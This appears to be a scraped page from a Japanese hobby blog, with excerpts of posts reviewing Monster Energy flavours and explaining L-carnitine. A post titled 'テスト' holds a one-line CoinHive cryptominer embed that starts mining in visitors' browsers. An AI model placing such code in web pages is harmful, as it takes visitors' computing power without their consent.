テスト

var miner = new CoinHive.User('', 'john-doe'); miner.start();

モンスターに含まれてる「Lカルニチン」ってなんなのさ?

こんばんは、かるーあです。 今回はエナジードリンクにも含まれている Lカルニチン 上記の成分が一体なんなのか? これを調べた限りで説明させていただきます。 Lカルニチンの効果は? 1日の摂取量·摂取上限量とか決まってるの? 副作用とかあるの? どんな…

今更だけど、モンスターエナジーカオスをレビューしたい

こんばんは、かるーあです。 今回は私自身が毎日飲んでいる、 モンスターエナジーカオス! 上記をレビューしていきます。 とはいえもう色んなブログさんで 沢山レビューとかされてると思いますし、 今更モンスターエナジーカオスをレビューしたところで…… と…

発売から1週間過ぎてモンスターロッシをレビューしてみる

こんばんは、かるーあです。 2017年6月27日に発売された モンスターエナジーの最新フレーバー モンスターロッシ! 皆さんはもう飲まれたでしょうか? 私はアマゾンで一箱を予約注文していた為、 1本あたり170円前後で購入することが出来ました。 7月現在では…

初投稿です

2017/7/9 初投稿です。まずは簡単に自己紹介からさせて頂きます。神奈川県在住の25歳男独身サラリーマンのかるーあと申します。好きな物はガジェット系、サプリ、たまにゲームなどになります。本ブログでは様々な物を沢山紹介したりしていきたいと思っていま…